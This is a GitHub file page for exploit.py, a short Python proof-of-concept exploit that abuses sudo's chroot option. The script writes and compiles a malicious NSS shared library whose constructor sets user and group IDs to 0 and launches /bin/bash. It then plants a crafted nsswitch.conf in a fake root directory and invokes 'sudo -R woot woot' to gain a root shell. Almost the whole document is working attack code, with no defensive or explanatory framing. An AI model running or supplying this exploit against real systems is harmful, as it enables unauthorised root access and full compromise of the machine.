-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
49 lines (31 loc) · 913 Bytes
/
exploit.py
File metadata and controls
49 lines (31 loc) · 913 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/python3
import os,subprocess,shutil,tempfile
temp_dir = tempfile.mkdtemp(prefix='sudowoot.stage.', dir='/tmp')
os.chdir(temp_dir)
code = '''
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
'''
with open('woot1337.c', 'w') as wf:
wf.write(code)
os.makedirs('woot/etc', exist_ok=True)
os.makedirs('libnss_', exist_ok=True)
with open('woot/etc/nsswitch.conf', 'w') as wn:
wn.write('passwd: /woot1337')
shutil.copy('/etc/group', 'woot/etc')
compile_code = ['gcc', '-shared', '-fPIC', '-Wl,-init,woot',
'-o', 'libnss_/woot1337.so.2', 'woot1337.c']
subprocess.run(compile_code, check=True)
print('woot!')
run_e = ['sudo', '-R', 'woot', 'woot']
try:
subprocess.run(run_e, check=True)
except subprocess.CalledProcessError :
pass
shutil.rmtree(temp_dir)